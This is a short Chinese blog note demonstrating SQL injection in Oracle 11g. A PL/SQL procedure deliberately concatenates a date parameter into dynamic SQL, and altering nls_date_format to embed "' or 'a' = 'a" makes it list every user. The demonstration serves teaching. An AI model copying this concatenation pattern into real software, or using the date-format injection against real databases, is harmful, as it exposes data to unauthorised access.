[20170912]sql injection例子.txt
[20170912]sql injection例子.txt
--//來之tom的例子,做一個記錄.也許以後講解需要!!
1.環境:
SCOTT@book> @ &r/ver1
PORT_STRING VERSION BANNER
------------------------------ -------------- --------------------------------------------------------------------------------
x86_64/Linux 2.4.xx 11.2.0.4.0 Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
create or replace procedure inj( p_date in date )
as
l_rec all_users%rowtype;
c sys_refcursor;
l_query long;
begin
l_query := '
select *
from all_users
where created = ''' ||p_date ||'''';
dbms_output.put_line( l_query );
open c for l_query;
for i in 1 .. 5
loop
fetch c into l_rec;
exit when c%notfound;
dbms_output.put_line( l_rec.username || '.....' );
end loop;
close c;
end;
/
SCOTT@book> show parameter nls_date_format
NAME TYPE VALUE
---------------- ------- ---------------------
nls_date_format string YYYY-MM-DD HH24:MI:SS
SCOTT@book> exec inj(sysdate)
select *
from all_users
where created = '2017-09-12 08:47:16'
PL/SQL procedure successfully completed.
--//注意sql語句的輸出.
2.修改環境變數定義:
SCOTT@book> alter session set nls_date_format = 'yyyy-mm-dd hh24:mi:ss"'' or ''a'' = ''a"';
Session altered.
SCOTT@book> exec inj(sysdate)
select *
from all_users
where created = '2017-09-12 08:48:10' or 'a' = 'a'
TEST.....
WYL.....
BI.....
PM.....
SH.....
PL/SQL procedure successfully completed.
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/267265/viewspace-2144828/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- False SQL Injection and Advanced Blind SQL InjectionFalseSQL
- SQL注射/SQL Injection漏洞SQL
- Hacking Oracle with Sql InjectionOracleSQL
- SQL Injection via DNSSQLDNS
- Drupal - pre Auth SQL Injection VulnerabilitySQL
- DVWA-SQL Injection(SQL隱碼攻擊)SQL
- Zabbix SQL Injection/RCE – CVE-2013-5743SQL
- DVWA靶場實戰(七)——SQL InjectionSQL
- [20190312]bash IFS例子.txt
- [20200208]awk學習例子.txt
- Shell Injection & Command Injection
- [20231226]vim Align外掛使用例子.txt
- dependency injection
- [20181219]不能使用USE_CONCAT優化例子.txt優化
- [20201209]模擬ora-04031的測試例子.txt
- [20190221]sql patch 問題.txtSQL
- [20180927]修改sql prompt提示.txtSQL
- [20231128]完善ashtable.sql.txtSQL
- [20200801]sql hint衝突.txtSQL
- [20201224]sql優化困惑.txtSQL優化
- [20240607]PL/SQL中sql語句的註解.txtSQL
- [20180808]Null value to Dynamic SQL.txtNullSQL
- [20201105]再分析sql語句.txtSQL
- [20190430]注意sql hint寫法.txtSQL
- [20211210]swc.sql如何使用.txtSQL
- [20220117]超長sql語句.txtSQL
- [20211123]完善expand sql text.txtSQL
- [20201210]sql語句優化.txtSQL優化
- 12C SQL Translation Framework.txtSQLFramework
- [20231117]完善ashtt.sql指令碼.txtSQL指令碼
- [20191112]SQL Tuning by adding column alias (2).txtSQL
- [20191122]oracel SQL parsing function qcplgte.txtSQLFunction
- Java 中如何使用 SQL 查詢 TXTJavaSQL
- [20211230]完善sql_id指令碼.txtSQL指令碼
- [20220331]如何調整sql語句.txtSQL
- [20211122]完善descx.sql指令碼.txtSQL指令碼
- [20221012]完善spsw.sql指令碼.txtSQL指令碼
- [20221010]完善descz.sql指令碼.txtSQL指令碼
- [20221101]完善descz.sql指令碼.txtSQL指令碼